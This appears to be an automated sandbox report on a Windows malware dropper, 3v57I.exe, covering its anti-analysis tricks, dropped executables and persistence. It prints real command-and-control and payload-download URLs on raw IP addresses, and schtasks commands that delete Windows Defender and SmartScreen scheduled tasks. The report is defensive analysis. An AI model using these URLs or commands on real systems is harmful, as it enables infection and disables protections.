__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 70 37 2d 12 01 exception.symbol: 3v57i+0x1e3702 exception.instruction: in eax, dx exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1980162 exception.address: 0xb03702 registers.esp: 1571408 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 3999985684 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 11534730 registers.ecx: 10	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 0f b7 d3 6a 00 56 e8 03 00 00 00 20 exception.symbol: 3v57i+0x1e8be5 exception.instruction: int 1 exception.module: 3v57I.exe exception.exception_code: 0xc0000005 exception.offset: 2001893 exception.address: 0xb08be5 registers.esp: 1571376 registers.edi: 0 registers.eax: 1571376 registers.ebp: 3999985684 registers.edx: 4294937846 registers.ebx: 11570422 registers.esi: 9439555 registers.ecx: 11569819	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 52 e9 07 01 00 00 50 81 34 24 5e 8f df 7e 5f exception.symbol: 3v57i+0x1e979e exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2004894 exception.address: 0xb0979e registers.esp: 1571412 registers.edi: 1114345 registers.eax: 28632 registers.ebp: 3999985684 registers.edx: 2130566501 registers.ebx: 27664765 registers.esi: 537682432 registers.ecx: 11571345	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 61 01 00 00 50 57 e9 26 00 00 00 5a e9 06 exception.symbol: 3v57i+0x1e91c9 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2003401 exception.address: 0xb091c9 registers.esp: 1571416 registers.edi: 1114345 registers.eax: 28632 registers.ebp: 3999985684 registers.edx: 6379 registers.ebx: 4294941472 registers.esi: 537682432 registers.ecx: 11599977	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 56 e9 a3 08 00 00 b9 15 79 bb 7d e9 3c 03 00 exception.symbol: 3v57i+0x1f7e1b exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2063899 exception.address: 0xb17e1b registers.esp: 1571412 registers.edi: 9957726 registers.eax: 26226 registers.ebp: 3999985684 registers.edx: 11631716 registers.ebx: 27664984 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 47 02 00 00 52 e9 06 07 00 00 83 c4 04 87 exception.symbol: 3v57i+0x1f7f4a exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2064202 exception.address: 0xb17f4a registers.esp: 1571416 registers.edi: 9957726 registers.eax: 26226 registers.ebp: 3999985684 registers.edx: 11657942 registers.ebx: 397801 registers.esi: 4294943952 registers.ecx: 0	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb ba 77 ff 9f 7c f7 da 55 bd c1 d3 7f 55 09 ea exception.symbol: 3v57i+0x1fcebc exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2084540 exception.address: 0xb1cebc registers.esp: 1571408 registers.edi: 9957726 registers.eax: 4294940428 registers.ebp: 3999985684 registers.edx: 11657942 registers.ebx: 11680753 registers.esi: 604277079 registers.ecx: 11657942	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 7d 00 00 00 51 e9 ea 01 00 00 bd 04 00 00 exception.symbol: 3v57i+0x1feba5 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2091941 exception.address: 0xb1eba5 registers.esp: 1571408 registers.edi: 9957726 registers.eax: 4294942644 registers.ebp: 3999985684 registers.edx: 11686594 registers.ebx: 11680753 registers.esi: 84201 registers.ecx: 7343447	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb e9 68 fd ff ff 31 74 24 04 8b 34 24 e9 65 fc exception.symbol: 3v57i+0x2037bf exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2111423 exception.address: 0xb237bf registers.esp: 1571408 registers.edi: 4294942532 registers.eax: 14827 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 11705131 registers.esi: 84201 registers.ecx: 1787166720	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 68 1e f5 98 06 89 0c 24 56 53 68 07 79 c6 7c exception.symbol: 3v57i+0x20e816 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2156566 exception.address: 0xb2e816 registers.esp: 1571408 registers.edi: 28618 registers.eax: 31485 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 11755974 registers.esi: 11740800 registers.ecx: 2142287216	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 52 c7 04 24 73 c2 33 7d 56 e9 fb 04 00 00 31 exception.symbol: 3v57i+0x20e914 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2156820 exception.address: 0xb2e914 registers.esp: 1571408 registers.edi: 2886605672 registers.eax: 4294938588 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 11755974 registers.esi: 11740800 registers.ecx: 2142287216	1
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: fb 51 89 e1 81 c1 04 00 00 00 e9 bd fa ff ff ba exception.symbol: 3v57i+0x223361 exception.instruction: sti exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 2241377 exception.address: 0xb43361 registers.esp: 1571376 registers.edi: 8961365 registers.eax: 11837596 registers.ebp: 3999985684 registers.edx: 2130566132 registers.ebx: 1787211633 registers.esi: 11804050 registers.ecx: 1787166720	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (11 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.156.72.96/te4h2nus/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/5494432675/lYvr05n.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/6957769607/FuaxeNA.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/6586442134/OE1vOqz.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/6629342726/dDthTIC.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/newdef/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/unique2/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/fate/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/unique1/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.219/files/6336929412/bPtJj46.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.64.18.63/test/amnew.exe

Performs some HTTP requests (11 events)

request	POST http://185.156.72.96/te4h2nus/index.php
request	GET http://80.64.18.219/files/5494432675/lYvr05n.exe
request	GET http://80.64.18.219/files/6957769607/FuaxeNA.exe
request	GET http://80.64.18.219/files/6586442134/OE1vOqz.exe
request	GET http://80.64.18.219/files/6629342726/dDthTIC.exe
request	GET http://80.64.18.219/newdef/random.exe
request	GET http://80.64.18.219/files/unique2/random.exe
request	GET http://80.64.18.219/files/fate/random.exe
request	GET http://80.64.18.219/files/unique1/random.exe
request	GET http://80.64.18.219/files/6336929412/bPtJj46.exe
request	GET http://80.64.18.63/test/amnew.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.156.72.96/te4h2nus/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 295 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73261000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e11000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 2936832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73741000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72bf1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ad4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b12000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ab1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72cc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a74000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ab2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72911000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72951000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75b71000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:39 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000004710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 184320 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04440000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04450000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 1484 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (2 events)

description	ramez.exe tried to sleep 137 seconds, actually delayed analysis time by 137 seconds
description	207216b66f.exe tried to sleep 304 seconds, actually delayed analysis time by 304 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (8 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW May 4, 2025, 12:45 p.m.	number_of_free_clusters: 3251821 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 4, 2025, 12:45 p.m.	number_of_free_clusters: 3251821 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 4, 2025, 12:45 p.m.	number_of_free_clusters: 3250637 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW May 4, 2025, 12:45 p.m.	number_of_free_clusters: 3250637 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW May 4, 2025, 12:39 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13191364608 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 4, 2025, 12:38 p.m.	total_number_of_free_bytes: 13322825728 free_bytes_available: 13322825728 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW May 4, 2025, 12:46 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 8594055765 root_path: C:\Users\test22\AppData\Roaming\MyApp\ total_number_of_bytes: 17825321166500176		0
GetDiskFreeSpaceExW May 4, 2025, 12:46 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13258788864 root_path: C:\Users\test22\AppData\Roaming\ total_number_of_bytes: 34252779520	1	1

Creates executable files on the filesystem (23 events)

file	C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3v57I.exe
file	C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
file	C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe
file	C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe
file	C:\Users\test22\AppData\Local\Temp\Work\cecho.exe
file	C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe
file	C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
file	C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2y9197.exe
file	C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\68140be001524.vbs
file	C:\Users\test22\AppData\Local\Temp\10020560101\08IyOOF.exe
file	C:\Users\test22\AppData\Local\Temp\34.bat
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1z90E9.exe
file	C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe
file	C:\Users\test22\AppData\Local\Temp\Work\nircmd.exe
file	C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe
file	C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe
file	C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
file	C:\Users\test22\AppData\Local\Temp\Work\7z.exe
file	C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v7n53.exe

Creates a shortcut to an executable file (13 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

Creates a suspicious process (10 events)

cmdline	schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
cmdline	schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
cmdline	C:\Windows\system32\cmd.exe /c ver
cmdline	schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
cmdline	C:\Windows\system32\cmd.exe /S /D /c" ver "
cmdline	C:\Windows\system32\cmd.exe /c tasklist
cmdline	cmd.exe /c 68140be001524.vbs
cmdline	schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
cmdline	schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f

Drops a binary and executes it (14 events)

file	C:\Users\test22\AppData\Local\Temp\34.bat
file	C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe
file	C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe
file	C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
file	C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe
file	C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
file	C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
file	C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
file	C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe
file	C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
file	C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe
file	C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe
file	C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\68140be001524.vbs

